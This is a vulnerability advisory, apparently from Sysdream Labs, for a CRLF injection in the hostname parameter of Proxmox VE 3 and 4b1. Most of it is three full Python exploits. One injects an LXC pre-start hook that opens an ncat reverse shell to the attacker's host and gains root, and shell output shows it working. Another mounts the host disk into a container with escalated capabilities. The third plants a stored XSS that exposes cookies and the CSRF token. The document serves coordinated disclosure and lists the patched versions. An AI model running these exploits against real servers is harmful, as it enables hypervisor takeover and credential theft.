Proxmox VE 3 / 4 XSS / Privilege Escalation / Code Execution

Risk: Medium
Local: No
Remote: Yes

===================================================================== Proxmox VE 3/4 Insecure Hostname Checking (Remote Root Exploit, XSS, Privileges escalation) ===================================================================== Description =========== Proxmox is a popular virtualization solution based on KVM and Linux containers. A critical vulnerability has been found in Proxmox VE 3 (OpenVZ) and Proxmox VE 4 beta 1 (LXC) in the virtual machine creating form allowing authenticated remote users to overwrite configuration files settings. Configuration file overwriting ============================== Because the Proxmox VE application doesn't check the user-provided "hostname" POST parameter, it's possible to overwrite configuration files using a CRLF injection. In Proxmox VE 3, we successfully gained access to the host filesystem from a container and elevated our container capabilities, allowing us to obtain user credentials and sniff the network. In Proxmox VE 4b1, because LXC allows "hooks" to execute commands, we successfully gained root privileges on the host. It's also possible to exploit Proxmox clusters. **Access Vector**: remote **Security Risk**: high **Vulnerability**: CWE-915 Proof of Concept ---------------- The following exploit works for Proxmox VE 4 beta 1. The lxc.hook.pre-start configuration variable is used to trigger the ncat reverse-shell payload when the container is started. #!/usr/bin/env python import requests import socket import telnetlib from threading import Thread import argparse from time import sleep def exploit(target, username, password, vmid, template, realm, reverse, hostname): payload = "ncat %s %s -e /bin/sh" % reverse print "[~] Obtaining authorization key..." apireq ="https://%s/api2/extjs/access/ticket" % target, verify=False, data={"username": username, "password": password, "realm": realm}) response = apireq.json() if "success" in response and response["success"]: print "[+] Authentication success." ticket = response["data"]["ticket"] csrfticket = response["data"]["CSRFPreventionToken"] createvm ="https://%s/api2/extjs/nodes/%s/lxc" % (target, hostname), verify=False, headers={"CSRFPreventionToken": csrfticket}, cookies={"PVEAuthCookie": ticket}, data={"vmid": vmid, "hostname":"sysdream\nlxc.hook.pre-start=%s &&" % payload, "storage": "local", "password": "sysdream", "ostemplate": template, "memory": 512, "swap": 512, "disk": 2, "cpulimit": 1, "cpuunits": 1024, "net0":"name=eth0"}) if createvm.status_code == 200: response = createvm.json() if "success" in response and response["success"]: print "[+] Container Created... (Sleeping 20 seconds)" sleep(20) print "[+] Starting container..." startcontainer ="https://%s/api2/extjs/nodes/%s/lxc/%s/status/start" % (target, hostname, vmid), verify=False, headers={"CSRFPreventionToken": csrfticket}, cookies={"PVEAuthCookie": ticket}) if startcontainer.status_code == 200: response = startcontainer.json() if "success" in response and response["success"]: print "[+] Exploit should be working..." else: print "[!] Can't start container ! Try to start it manually." else: print "[!] Error creating container..." print response else: print "[!] Error creating Container. Bad HTTP Status code : %d" % createvm.status_code else: print "[!] Authentication failed - Check the credentials..." def handler(lport): print "[~] Starting handler on port %d" % lport t = telnetlib.Telnet() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("", lport)) s.listen(1) conn, addr = s.accept() print "[+] Connection from %s" % addr[0] t.sock = conn print "[+] Pop the shell ! :)" t.interact() if __name__ == "__main__": print "[~] Proxmox VE 4.0b1 Authenticated Root Exploit - Nicolas Chatelain <n.chatelain[at]>\n" parser = argparse.ArgumentParser() parser.add_argument("--target", required=True, help="The target host (eg :") parser.add_argument("--username", required=True) parser.add_argument("--password", required=True) parser.add_argument("--localhost", required=True, help="Local host IP for the connect-back shell.") parser.add_argument("--localport", required=True, type=int, help="Local port for local bind handler") parser.add_argument("--vmid", required=False, default="999", type=int, help="A unique ID for the container, exploit will fail if the ID already exists.") parser.add_argument("--template", required=False, default="local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz", help="An existing template in the hypervisor " "(default : local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz)") parser.add_argument("--realm", required=False, default="pam", choices=["pve", "pam"]) parser.add_argument("--hostname", required=True, help="The target hostname") args = parser.parse_args() handlerthr = Thread(target=handler, args=(args.localport,)) handlerthr.start() exploitthr = Thread(target=exploit, args=(, args.username, args.password, args.vmid, args.template, args.realm, (args.localhost, args.localport), args.hostname)) exploitthr.start() handlerthr.join() Shell output : nightlydev@nworkstation ~/Lab/Proxmox_Exploits $ python --target --username nicolas --password pveuser --localhost --localport 9999 --vmid 456 --realm pve --hostname pve4 [~] Proxmox VE 4.0b1 Authenticated Root Exploit - Nicolas Chatelain <n.chatelain[at]> [~] Starting handler on port 9999 [~] Obtaining authorization key... [+] Authentication success. [+] Container Created... (Sleeping 20 seconds) [+] Exploit should be working... [+] Connection from [+] Pop the shell ! whoami root id uid=0(root) gid=0(root) groups=0(root) The following exploit works for Proxmox VE 3. This proof of concept mount the host /dev/dm-0 on the container and add multiples capabilities on the container. #!/usr/bin/env python import requests import socket import telnetlib from threading import Thread import argparse def exploit(target, username, password, vmid, template, realm, hostname): payload = "sysdream\"\nDEVNODES=\"dm-0:r \"\nCAPABILITIES=\"mknod:on, sys_chroot:on, sys_rawio: on, net_admin:on, dac_override:on\"\n#" print "[~] Obtaining authorization key..." apireq ="https://%s/api2/extjs/access/ticket" % target, verify=False, data={"username": username, "password": password, "realm": realm}) response = apireq.json() if "success" in response and response["success"]: print "[+] Authentication success." ticket = response["data"]["ticket"] csrfticket = response["data"]["CSRFPreventionToken"] createvm ="https://%s/api2/extjs/nodes/%s/openvz" % (target, hostname), verify=False, headers={"CSRFPreventionToken": csrfticket}, cookies={"PVEAuthCookie": ticket}, data={"vmid": vmid, "hostname": payload, "storage": "local", "password": "sysdream", "ostemplate": template, "memory": 512, "swap": 512, "disk": 2, "cpus": 1, "netif":"ifname=eth0,bridge=vmbr0"}) if createvm.status_code == 200: response = createvm.json() if "success" in response and response["success"]: print "[+] Countainer (Capabilities + DM-0 Mount) Created." else: print "[!] Error creating container..." print response else: print "[!] Error creating Container. Bad HTTP Status code : %d" % createvm.status_code else: print "[!] Authentication failed - Check the credentials..." if __name__ == "__main__": print "[~] Proxmox VE 3 Authenticated Privileges Escalation Exploit - Nicolas Chatelain <n.chatelain[at]>\n" parser = argparse.ArgumentParser() parser.add_argument("--target", required=True, help="The target host (eg :") parser.add_argument("--username", required=True) parser.add_argument("--password", required=True) parser.add_argument("--vmid", required=False, default="999", type=int, help="A unique ID for the container, exploit will fail if the ID already exists.") parser.add_argument("--template", required=False, default="local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz", help="An existing template in the hypervisor (default : local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz)") parser.add_argument("--hostname", required=True, help="The target hostname") parser.add_argument("--realm", required=False, default="pam", choices=["pve", "pam"]) args = parser.parse_args() exploit(, args.username, args.password, args.vmid, args.template, args.realm, args.hostname) Shell output : nightlydev@nworkstation ~/Lab/Proxmox_Exploits $ python --username root --password sysofdream --vmid 123 --realm pam --target --hostname pve3 [~] Proxmox VE 3 Authenticated Privileges Escalation Exploit - Nicolas Chatelain <n.chatelain[at]> [~] Obtaining authorization key... [+] Authentication success. [+] Countainer (Capabilities + DM-0 Mount) Created. -- On container : root@sysdream:/# ls -lah /dev/dm-0 brw-r----T 1 root root 253, 0 Aug 23 00:33 /dev/dm-0 --- Stored Cross-Site Scripting =========================== Same vulnerability, different usage. Works on Proxmox 3 and Proxmox 4b1. **Access Vector**: remote **Security Risk**: high Proof of Concept ---------------- The following exploit will create a stored XSS displaying the user cookies and the PVE CSRFPreventionToken. #!/usr/bin/env python import requests import socket import telnetlib from threading import Thread import argparse def exploit(target, username, password, vmid, template, realm, version, hostname): payload = "eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,43,34,45,34,32,43,32,80,86,69,46,67,83,82,70,80,114,101,118,101,110,116,105,111,110,84,111,107,101,110,41,59))" print "[~] Obtaining authorization key..." apireq ="https://%s/api2/extjs/access/ticket" % target, verify=False, data={"username": username, "password": password, "realm": realm}) response = apireq.json() if "success" in response and response["success"]: print "[+] Authentication success." ticket = response["data"]["ticket"] csrfticket = response["data"]["CSRFPreventionToken"] if version == "4": createvm ="https://%s/api2/extjs/nodes/%s/lxc" % (target, hostname), verify=False, headers={"CSRFPreventionToken": csrfticket}, cookies={"PVEAuthCookie": ticket}, data={"vmid": vmid, "hostname":"<img/src='x'/onerror=%s>" % payload, "storage": "local", "password": "sysdream", "ostemplate": template, "memory": 512, "swap": 512, "disk": 2, "cpulimit": 1, "cpuunits": 1024, "net0":"name=eth0"}) elif version == "3": createvm ="https://%s/api2/extjs/nodes/%s/openvz" % (target, hostname), verify=False, headers={"CSRFPreventionToken": csrfticket}, cookies={"PVEAuthCookie": ticket}, data={"vmid": vmid, "hostname":"<img/src='x'/onerror=%s>" % payload, "storage": "local", "password": "sysdream", "ostemplate": template, "memory": 512, "swap": 512, "disk": 2, "cpus": 1, "netif":"ifname=eth0,bridge=vmbr0"}) if createvm.status_code == 200: response = createvm.json() if "success" in response and response["success"]: print "[+] Stored XSS Created." else: print "[!] Error creating container..." print response else: print "[!] Error creating Container. Bad HTTP Status code : %d" % createvm.status_code else: print "[!] Authentication failed - Check the credentials..." if __name__ == "__main__": print "[~] Proxmox VE 3/4b1 Stored Cross Site Scripting - Nicolas Chatelain <n.chatelain[at]>\n" parser = argparse.ArgumentParser() parser.add_argument("--target", required=True, help="The target host (eg :") parser.add_argument("--username", required=True) parser.add_argument("--password", required=True) parser.add_argument("--vmid", required=False, default="999", type=int, help="A unique ID for the container, exploit will fail if the ID already exists.") parser.add_argument("--template", required=False, default="local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz", help="An existing template in the hypervisor (default : local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz)") parser.add_argument("--realm", required=False, default="pam", choices=["pve", "pam"]) parser.add_argument("--version", default="3", choices=["3", "4"], help="The Proxmox version to exploit") parser.add_argument("--hostname", required=True, help="The target hostname") args = parser.parse_args() exploit(, args.username, args.password, args.vmid, args.template, args.realm, args.version, args.hostname) --------------- Vulnerable code --------------- The vulnerable code is located in the /usr/share/perl5/PVE/ for Proxmox 4. For Proxmox 3, the vulnerable code is located in /usr/share/perl5/PVE/ -------- Solution -------- Proxmox 4 : Update to pve-container 0.9-22 Proxmox 3 : Update to pve-manager 3.4-10 Timeline (dd/mm/yyyy) ===================== 04/09/2015 : Initial discovery. 17/09/2015 : Contact with proxmox team. 18/09/2015 : Proxmox fixes the vulnerabilities. 18/09/2015 : Proxmox releases a new pve-container version (0.9-22) 18/09/2015 : Proxmox releases a new pve-manager version (3.4-10) Affected versions ================= * Proxmox VE 4 * Proxmox VE 3 Credits ======= * Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com) -- SYSDREAM Labs <> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: * Twitter: @sysdream

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